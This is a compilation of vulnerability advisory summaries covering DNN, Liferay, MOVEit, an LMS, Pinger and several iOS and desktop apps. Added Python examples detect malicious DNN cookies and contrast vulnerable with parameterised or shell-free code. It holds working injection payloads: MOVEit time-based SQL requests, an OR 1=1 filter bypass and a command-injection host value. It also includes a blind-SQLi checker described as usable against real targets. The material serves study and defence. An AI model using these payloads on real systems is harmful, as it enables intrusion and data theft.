This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store a user's profile information in the DNNPersonalization cookie as XML. The expected structure includes a "type" attribute that tells the server which .NET type to instantiate when the XML is deserialized. The cookie is processed whenever the application attempts to load the current user's profile data, which happens when DNN is configured to handle 404 errors with its built-in error page (the default configuration). Because the cookie is fully attacker-controlled, an attacker can leverage this vulnerability to execute arbitrary code on the system.
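A detection-side check for the mechanism described above, written here as an added example in Python (it is not part of the module or of DNN). It treats the DNNPersonalization cookie as untrusted XML and reports every "type" attribute that is not one of the simple profile value types a legitimate cookie carries. The element layout (a profile root with item children), the allowlist of expected types and both sample cookies are assumptions constructed for the example, not captured traffic.

```python
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Assumption: only these simple .NET value types are expected in a genuine profile cookie.
# Adjust the allowlist to what your own DNN instance actually emits.
EXPECTED_TYPES = {
    "System.String",
    "System.Int32",
    "System.Int64",
    "System.Boolean",
    "System.DateTime",
    "System.Double",
}


def audit_dnn_personalization(cookie_value: str) -> list:
    """Return every unexpected 'type' value found in a DNNPersonalization cookie.

    A non-empty result is worth alerting on. A cookie that is not well-formed XML is
    reported as ["<unparseable>"]; an item with no type attribute is reported too,
    because the server's deserializer would not know what to build from it.
    """
    raw = unquote(cookie_value)  # the cookie travels URL-encoded
    try:
        root = ET.fromstring(raw)
    except ET.ParseError:
        return ["<unparseable>"]
    findings = []
    for item in root.iter("item"):
        declared = item.get("type")
        if declared is None:
            findings.append("<missing type attribute>")
        # Strip an assembly-qualified suffix ("Type, Assembly") before the allowlist lookup.
        elif declared.split(",")[0].strip() not in EXPECTED_TYPES:
            findings.append(declared)
    return findings


def is_suspicious(cookie_value: str) -> bool:
    return bool(audit_dnn_personalization(cookie_value))


# Constructed sample cookies for the example (not real traffic).
BENIGN_COOKIE = (
    '<profile><item key="name1:key1" type="System.String">'
    "<string>dark-theme</string></item></profile>"
)
SUSPICIOUS_COOKIE = (
    '<profile><item key="name1:key1" '
    'type="System.Windows.Data.ObjectDataProvider, PresentationFramework">'
    "<ObjectDataProvider /></item></profile>"
)
```

Run it over the DNNPersonalization value of every request that hits the 404 handler; a type outside the allowlist, a missing type or unparseable XML is the signal, regardless of which gadget chain the payload carries.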
This module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions prior to 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4 and 7.2.1 GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
BlazeDVD 7.0.2 contains a buffer overflow caused by improper bounds checking of data read from .plf playlist files. The vulnerability is triggered when the application opens a specially crafted .plf file and can lead to arbitrary code execution.
The script has an SQL injection in the books category listing, at /lms/home/book?category_name=00* (the * marks the injection point). A stray quote in the value reaches the query unescaped and produces a MySQL error:

Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3

SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, `book_info`.`number_of_books`, `book_info`.`id`, `book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as `size`, `book_info`.`publishing_year`, `book_info`.`publisher`, `book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`, `book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`, `book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'', category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21

Filename: models/Basic.php
Line Number: 284
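To show why the quote breaks the statement and what else the same injection point allows, here is an added Python example that is not the LMS code. It rebuilds the FIND_IN_SET() filter from the error message against an in-memory SQLite database (FIND_IN_SET is registered as a user function, since SQLite has no built-in one), runs it once with the request value interpolated into the string and once with a bound parameter. The table and its rows are constructed sample data; only the WHERE clause is modelled on the query above.

```python
import sqlite3


def find_in_set(needle, haystack):
    """Python stand-in for MySQL's FIND_IN_SET(): 1-based position of needle in a
    comma-separated list, 0 when absent. Enough for this demonstration."""
    if needle is None or haystack is None:
        return 0
    parts = str(haystack).split(",")
    return parts.index(str(needle)) + 1 if str(needle) in parts else 0


def make_db():
    # Constructed sample data, not the LMS schema.
    conn = sqlite3.connect(":memory:")
    conn.create_function("FIND_IN_SET", 2, find_in_set)
    conn.execute(
        "CREATE TABLE book_info (id INTEGER, title TEXT, category_id TEXT, deleted TEXT)"
    )
    conn.executemany(
        "INSERT INTO book_info VALUES (?, ?, ?, ?)",
        [
            (1, "Applied Cryptography", "57", "0"),
            (2, "Security Engineering", "57,12", "0"),
            (3, "Withdrawn Title", "57", "1"),  # soft-deleted, must never be listed
            (4, "Compilers", "12", "0"),
        ],
    )
    return conn


def vulnerable_lookup(conn, category_id):
    # The request value is pasted straight into the statement: the pattern behind the error.
    sql = (
        "SELECT title FROM book_info "
        f"WHERE FIND_IN_SET('{category_id}', category_id) != 0 "
        "AND deleted = '0' ORDER BY title ASC"
    )
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, category_id):
    # Same query with a bound parameter: the value is data and cannot alter the statement.
    sql = (
        "SELECT title FROM book_info "
        "WHERE FIND_IN_SET(?, category_id) != 0 "
        "AND deleted = '0' ORDER BY title ASC"
    )
    return [row[0] for row in conn.execute(sql, (category_id,))]


def query_breaks(conn, category_id):
    """True when the interpolated statement is no longer valid SQL (the 1064-style error)."""
    try:
        vulnerable_lookup(conn, category_id)
    except sqlite3.OperationalError:
        return True
    return False
```

The single quote reproduces the syntax error; a value such as 0', category_id) != 0 OR 1=1 -- comments out the deleted = '0' filter and lists every row, including withdrawn titles. The parameterised form returns an empty result for both.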
The Vulnerability Laboratory core research team discovered a directory traversal web vulnerability in the official File Transfer iFamily v2.1 iOS mobile application.
The Vulnerability Laboratory core research team discovered multiple persistent vulnerabilities in the SeedDMS v5.1.16 and v5.1.18 web application.
Pinger 1.0 is a simple jQuery frontend to a PHP backend that pings various devices and switches their colour between green and red depending on whether each device is up or down. The backend scripts ping.php and socket.php pass their request parameters to the server without sanitisation, where the value is executed; an attacker can exploit this by sending a crafted value in those parameters and run arbitrary commands on the server.
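The pattern behind that bug, shown as an added Python example rather than Pinger's PHP: a host value concatenated into a shell command line beside the hardened form, which validates the target as an IP address or hostname and invokes the program with an argv list and no shell. To keep the example runnable offline, echo stands in for the real ping binary (an assumption; the shell parsing is what matters). The hostname grammar is a conservative RFC 1123 approximation chosen for this example.

```python
import ipaddress
import re
import subprocess

# Conservative hostname grammar (RFC 1123 labels); an assumption for this example.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def validate_target(host: str) -> str:
    """Return host unchanged if it is an IP address or a plausible hostname, else raise."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"refusing to ping {host!r}: not an IP address or hostname")


def is_valid_target(host: str) -> bool:
    try:
        validate_target(host)
        return True
    except ValueError:
        return False


def ping_vulnerable(host: str) -> str:
    # Request value concatenated into a command line handed to /bin/sh: ';', '|', '$()'
    # and friends in the value are interpreted by the shell, not passed to the program.
    cmd = f"echo pinging {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_safe(host: str) -> str:
    target = validate_target(host)
    # argv list, no shell: whatever remains in target is a single argument to echo.
    return subprocess.run(
        ["echo", "pinging", target], capture_output=True, text=True
    ).stdout
```

With the vulnerable variant, a device name of 127.0.0.1; echo INJECTED runs the second command; the safe variant rejects it before anything is executed, and even a value that passes validation cannot reach a shell.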
The Vulnerability Laboratory core research team discovered multiple persistent cross-site scripting (XSS) vulnerabilities in the official SuperBackup v2.0.5 iOS mobile application.
B64dec 1.1.2 contains a buffer overflow caused by improper bounds checking of user-supplied input. A specially crafted input overwrites a Structured Exception Handler (SEH) record; the exploit uses that SEH overwrite to gain control of execution and an egg hunter to locate the payload in memory, leading to arbitrary code execution.
The API call for revoking logon tokens is vulnerable to a time-based blind SQL injection via the 'token' parameter.

MSSQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

token='; WAITFOR DELAY '0:0:10'--

MySQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

token=' OR SLEEP(10);--
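A time-based blind check built around those two payloads, as an added Python example (not MOVEit code and not a published exploit). The checker takes any callable that submits a form body and returns a status, measures a baseline with a harmless token, then sends the MSSQL and MySQL delay payloads and reports which dialect, if any, stalled the response by roughly the requested delay. So that it runs offline, the example ships with a constructed stand-in for the revoke endpoint that concatenates the token into SQL and honours WAITFOR DELAY or SLEEP() by sleeping; the SQL statement it builds and the 0.8 tolerance factor are assumptions of the example.

```python
import re
import time
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode

# The two payloads from the advisory, parametrised on the delay in seconds.
PAYLOADS = {
    "mssql": "'; WAITFOR DELAY '0:0:{s}'--",
    "mysql": "' OR SLEEP({s});--",
}


def make_vulnerable_endpoint(dialect: str) -> Callable[[str], int]:
    """Constructed stand-in for POST /api/v1/token/revoke (not MOVEit code): the token is
    concatenated into a statement, which is 'executed' by honouring the dialect's delay
    function. Everything else about the request is ignored."""

    def handle(body: str) -> int:
        token = parse_qs(body).get("token", [""])[0]
        sql = f"UPDATE tokens SET revoked = 1 WHERE token = '{token}'"  # assumed statement
        if dialect == "mssql":
            m = re.search(r"WAITFOR DELAY '(\d+):(\d+):(\d+(?:\.\d+)?)'", sql)
            if m:
                h, mi, s = m.groups()
                time.sleep(int(h) * 3600 + int(mi) * 60 + float(s))
        elif dialect == "mysql":
            m = re.search(r"SLEEP\((\d+(?:\.\d+)?)\)", sql)
            if m:
                time.sleep(float(m.group(1)))
        return 200

    return handle


def safe_endpoint(body: str) -> int:
    # A parameterised revoke: the token is bound as data, so no delay function ever runs.
    parse_qs(body)
    return 200


def timed(send: Callable[[str], int], token: str) -> float:
    """Submit one form body and return the elapsed wall-clock seconds."""
    body = urlencode({"token": token})
    start = time.perf_counter()
    send(body)
    return time.perf_counter() - start


def detect_time_based_sqli(send: Callable[[str], int], delay: float = 10.0,
                           baseline_runs: int = 3) -> Optional[str]:
    """Return 'mssql' or 'mysql' when the matching delay payload stalls the response,
    None otherwise. The baseline is the slowest of several benign requests so that
    ordinary latency is not mistaken for an injected delay."""
    baseline = max(timed(send, "not-a-real-token") for _ in range(baseline_runs))
    for dialect, template in PAYLOADS.items():
        elapsed = timed(send, template.format(s=delay))
        if elapsed >= baseline + 0.8 * delay:
            return dialect
    return None
```

Against a real target, wrap an HTTP client in the send callable and keep the delay well above the baseline jitter (the advisory's 10 seconds is a sensible default); the stand-in endpoints exist only so the logic can be exercised without a network.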